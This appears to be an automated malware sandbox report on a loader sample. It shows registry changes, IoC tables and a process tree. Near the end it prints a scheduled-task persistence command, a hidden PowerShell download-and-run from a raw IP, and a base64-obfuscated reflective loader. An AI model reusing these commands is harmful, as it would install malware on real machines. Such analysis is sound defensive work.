Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\Language = "1033"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\f63a82ffaf9f93d1\\"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings	firefox.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\ = "ScreenConnect Client (f63a82ffaf9f93d1) Credential Provider"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\InprocServer32	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\AuthorizedLUAApp = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\SourceList\PackageName = "ScreenConnect.ClientSetup.msi"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\InstanceType = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5B15089AFED232366FA328FFFAF9391D\A29DCCB0F978A6CC351527E60284817E	msiexec.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
3468	schtasks.exe
4368	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1696	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3004	powershell.exe
3004	powershell.exe
1656	TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE
1656	TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE
2324	rapes.exe
2324	rapes.exe
1040	rapes.exe
1040	rapes.exe
1696	powershell.exe
1696	powershell.exe
1696	powershell.exe
5056	powershell.exe
5056	powershell.exe
5056	powershell.exe
1788	msiexec.exe
1788	msiexec.exe
4384	ScreenConnect.ClientService.exe
4384	ScreenConnect.ClientService.exe
4384	ScreenConnect.ClientService.exe
4384	ScreenConnect.ClientService.exe
4384	ScreenConnect.ClientService.exe
4384	ScreenConnect.ClientService.exe
2880	e9ea3a76fa.exe
2880	e9ea3a76fa.exe
2880	e9ea3a76fa.exe
2880	e9ea3a76fa.exe
2880	e9ea3a76fa.exe
2880	e9ea3a76fa.exe
3004	MSBuild.exe
3004	MSBuild.exe
3004	MSBuild.exe
3004	MSBuild.exe
2084	powershell.exe
2084	powershell.exe
2084	powershell.exe
4684	powershell.exe
4684	powershell.exe
4684	powershell.exe
2148	powershell.exe
2148	powershell.exe
2148	powershell.exe
4912	rapes.exe
4912	rapes.exe
2692	powershell.exe
2692	powershell.exe
2692	powershell.exe
4268	2983c11b74.exe
4268	2983c11b74.exe
1348	NP4kBrG.exe
1348	NP4kBrG.exe
4268	2983c11b74.exe
4268	2983c11b74.exe
4268	2983c11b74.exe
4268	2983c11b74.exe
444	MSBuild.exe
444	MSBuild.exe
444	MSBuild.exe
444	MSBuild.exe
2512	Bell_Setup16.tmp
2512	Bell_Setup16.tmp
3468	regsvr32.exe
3468	regsvr32.exe
1300	powershell.exe
1300	powershell.exe

Suspicious behavior: LoadsDriver 4 IoCs

pid	Process
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3004	powershell.exe
Token: SeDebugPrivilege	1696	powershell.exe
Token: SeDebugPrivilege	5056	powershell.exe
Token: SeDebugPrivilege	2544	A9cowK5.exe
Token: SeShutdownPrivilege	3480	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3480	msiexec.exe
Token: SeSecurityPrivilege	1788	msiexec.exe
Token: SeCreateTokenPrivilege	3480	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3480	msiexec.exe
Token: SeLockMemoryPrivilege	3480	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3480	msiexec.exe
Token: SeMachineAccountPrivilege	3480	msiexec.exe
Token: SeTcbPrivilege	3480	msiexec.exe
Token: SeSecurityPrivilege	3480	msiexec.exe
Token: SeTakeOwnershipPrivilege	3480	msiexec.exe
Token: SeLoadDriverPrivilege	3480	msiexec.exe
Token: SeSystemProfilePrivilege	3480	msiexec.exe
Token: SeSystemtimePrivilege	3480	msiexec.exe
Token: SeProfSingleProcessPrivilege	3480	msiexec.exe
Token: SeIncBasePriorityPrivilege	3480	msiexec.exe
Token: SeCreatePagefilePrivilege	3480	msiexec.exe
Token: SeCreatePermanentPrivilege	3480	msiexec.exe
Token: SeBackupPrivilege	3480	msiexec.exe
Token: SeRestorePrivilege	3480	msiexec.exe
Token: SeShutdownPrivilege	3480	msiexec.exe
Token: SeDebugPrivilege	3480	msiexec.exe
Token: SeAuditPrivilege	3480	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3480	msiexec.exe
Token: SeChangeNotifyPrivilege	3480	msiexec.exe
Token: SeRemoteShutdownPrivilege	3480	msiexec.exe
Token: SeUndockPrivilege	3480	msiexec.exe
Token: SeSyncAgentPrivilege	3480	msiexec.exe
Token: SeEnableDelegationPrivilege	3480	msiexec.exe
Token: SeManageVolumePrivilege	3480	msiexec.exe
Token: SeImpersonatePrivilege	3480	msiexec.exe
Token: SeCreateGlobalPrivilege	3480	msiexec.exe
Token: SeCreateTokenPrivilege	3480	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3480	msiexec.exe
Token: SeLockMemoryPrivilege	3480	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3480	msiexec.exe
Token: SeMachineAccountPrivilege	3480	msiexec.exe
Token: SeTcbPrivilege	3480	msiexec.exe
Token: SeSecurityPrivilege	3480	msiexec.exe
Token: SeTakeOwnershipPrivilege	3480	msiexec.exe
Token: SeLoadDriverPrivilege	3480	msiexec.exe
Token: SeSystemProfilePrivilege	3480	msiexec.exe
Token: SeSystemtimePrivilege	3480	msiexec.exe
Token: SeProfSingleProcessPrivilege	3480	msiexec.exe
Token: SeIncBasePriorityPrivilege	3480	msiexec.exe
Token: SeCreatePagefilePrivilege	3480	msiexec.exe
Token: SeCreatePermanentPrivilege	3480	msiexec.exe
Token: SeBackupPrivilege	3480	msiexec.exe
Token: SeRestorePrivilege	3480	msiexec.exe
Token: SeShutdownPrivilege	3480	msiexec.exe
Token: SeDebugPrivilege	3480	msiexec.exe
Token: SeAuditPrivilege	3480	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3480	msiexec.exe
Token: SeChangeNotifyPrivilege	3480	msiexec.exe
Token: SeRemoteShutdownPrivilege	3480	msiexec.exe
Token: SeUndockPrivilege	3480	msiexec.exe
Token: SeSyncAgentPrivilege	3480	msiexec.exe
Token: SeEnableDelegationPrivilege	3480	msiexec.exe
Token: SeManageVolumePrivilege	3480	msiexec.exe
Token: SeImpersonatePrivilege	3480	msiexec.exe

Suspicious use of FindShellTrayWindow 37 IoCs

pid	Process
1180	2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1180	2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1180	2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3480	msiexec.exe
3480	msiexec.exe
2512	Bell_Setup16.tmp
444	7ef3f93a66.exe
444	7ef3f93a66.exe
444	7ef3f93a66.exe
444	7ef3f93a66.exe
444	7ef3f93a66.exe
444	7ef3f93a66.exe
444	7ef3f93a66.exe
3440	firefox.exe
444	7ef3f93a66.exe
3440	firefox.exe
3440	firefox.exe
3440	firefox.exe
3440	firefox.exe
3440	firefox.exe
3440	firefox.exe
3440	firefox.exe
444	7ef3f93a66.exe
3440	firefox.exe
3440	firefox.exe
3440	firefox.exe
3440	firefox.exe
3440	firefox.exe
3440	firefox.exe
3440	firefox.exe
3440	firefox.exe
3440	firefox.exe
444	7ef3f93a66.exe
3440	firefox.exe
444	7ef3f93a66.exe
7076	msiexec.exe
7076	msiexec.exe

Suspicious use of SendNotifyMessage 26 IoCs

pid	Process
1180	2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1180	2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1180	2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
444	7ef3f93a66.exe
444	7ef3f93a66.exe
444	7ef3f93a66.exe
444	7ef3f93a66.exe
444	7ef3f93a66.exe
444	7ef3f93a66.exe
444	7ef3f93a66.exe
444	7ef3f93a66.exe
3440	firefox.exe
3440	firefox.exe
3440	firefox.exe
3440	firefox.exe
444	7ef3f93a66.exe
3440	firefox.exe
3440	firefox.exe
3440	firefox.exe
3440	firefox.exe
3440	firefox.exe
3440	firefox.exe
3440	firefox.exe
3440	firefox.exe
444	7ef3f93a66.exe
444	7ef3f93a66.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1348	NP4kBrG.exe
3440	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1180 wrote to memory of 2920	1180	2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	89
PID 1180 wrote to memory of 2920	1180	2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	89
PID 1180 wrote to memory of 2920	1180	2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	89
PID 1180 wrote to memory of 4872	1180	2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	90
PID 1180 wrote to memory of 4872	1180	2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	90
PID 1180 wrote to memory of 4872	1180	2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	90
PID 2920 wrote to memory of 3468	2920	cmd.exe	92
PID 2920 wrote to memory of 3468	2920	cmd.exe	92
PID 2920 wrote to memory of 3468	2920	cmd.exe	92
PID 4872 wrote to memory of 3004	4872	mshta.exe	93
PID 4872 wrote to memory of 3004	4872	mshta.exe	93
PID 4872 wrote to memory of 3004	4872	mshta.exe	93
PID 3004 wrote to memory of 1656	3004	powershell.exe	102
PID 3004 wrote to memory of 1656	3004	powershell.exe	102
PID 3004 wrote to memory of 1656	3004	powershell.exe	102
PID 1656 wrote to memory of 2324	1656	TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE	103
PID 1656 wrote to memory of 2324	1656	TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE	103
PID 1656 wrote to memory of 2324	1656	TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE	103
PID 2324 wrote to memory of 2448	2324	rapes.exe	111
PID 2324 wrote to memory of 2448	2324	rapes.exe	111
PID 2324 wrote to memory of 2448	2324	rapes.exe	111
PID 2448 wrote to memory of 3556	2448	cmd.exe	113
PID 2448 wrote to memory of 3556	2448	cmd.exe	113
PID 2448 wrote to memory of 3556	2448	cmd.exe	113
PID 3556 wrote to memory of 1696	3556	cmd.exe	115
PID 3556 wrote to memory of 1696	3556	cmd.exe	115
PID 3556 wrote to memory of 1696	3556	cmd.exe	115
PID 1696 wrote to memory of 5056	1696	powershell.exe	116
PID 1696 wrote to memory of 5056	1696	powershell.exe	116
PID 1696 wrote to memory of 5056	1696	powershell.exe	116
PID 2324 wrote to memory of 972	2324	rapes.exe	119
PID 2324 wrote to memory of 972	2324	rapes.exe	119
PID 2324 wrote to memory of 972	2324	rapes.exe	119
PID 972 wrote to memory of 2512	972	7d5ce09794.exe	120
PID 972 wrote to memory of 2512	972	7d5ce09794.exe	120
PID 972 wrote to memory of 2512	972	7d5ce09794.exe	120
PID 2512 wrote to memory of 3012	2512	221.exe	122
PID 2512 wrote to memory of 3012	2512	221.exe	122
PID 3012 wrote to memory of 3856	3012	cmd.exe	124
PID 3012 wrote to memory of 3856	3012	cmd.exe	124
PID 3012 wrote to memory of 3856	3012	cmd.exe	124
PID 3856 wrote to memory of 4804	3856	221.exe	125
PID 3856 wrote to memory of 4804	3856	221.exe	125
PID 4804 wrote to memory of 4500	4804	cmd.exe	162
PID 4804 wrote to memory of 4500	4804	cmd.exe	162
PID 4804 wrote to memory of 872	4804	cmd.exe	128
PID 4804 wrote to memory of 872	4804	cmd.exe	128
PID 4804 wrote to memory of 3208	4804	cmd.exe	129
PID 4804 wrote to memory of 3208	4804	cmd.exe	129
PID 4804 wrote to memory of 3440	4804	cmd.exe	131
PID 4804 wrote to memory of 3440	4804	cmd.exe	131
PID 4804 wrote to memory of 2172	4804	cmd.exe	132
PID 4804 wrote to memory of 2172	4804	cmd.exe	132
PID 4804 wrote to memory of 3476	4804	cmd.exe	133
PID 4804 wrote to memory of 3476	4804	cmd.exe	133
PID 4804 wrote to memory of 4568	4804	cmd.exe	134
PID 4804 wrote to memory of 4568	4804	cmd.exe	134
PID 4804 wrote to memory of 3196	4804	cmd.exe	135
PID 4804 wrote to memory of 3196	4804	cmd.exe	135
PID 4804 wrote to memory of 3816	4804	cmd.exe	136
PID 4804 wrote to memory of 3816	4804	cmd.exe	136
PID 4804 wrote to memory of 2252	4804	cmd.exe	137
PID 4804 wrote to memory of 2252	4804	cmd.exe	137
PID 4804 wrote to memory of 1656	4804	cmd.exe	138

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1180
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn Sl6W2masdNy /tr "mshta C:\Users\Admin\AppData\Local\Temp\fZkhgKZa4.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2920
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn Sl6W2masdNy /tr "mshta C:\Users\Admin\AppData\Local\Temp\fZkhgKZa4.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3468
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\fZkhgKZa4.hta
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4872
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'PVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3004
  - - C:\Users\Admin\AppData\Local\TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE
      "C:\Users\Admin\AppData\Local\TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1656
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2324
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10373951121\5YB5L4K.cmd"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2448
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10373951121\5YB5L4K.cmd"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3556
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
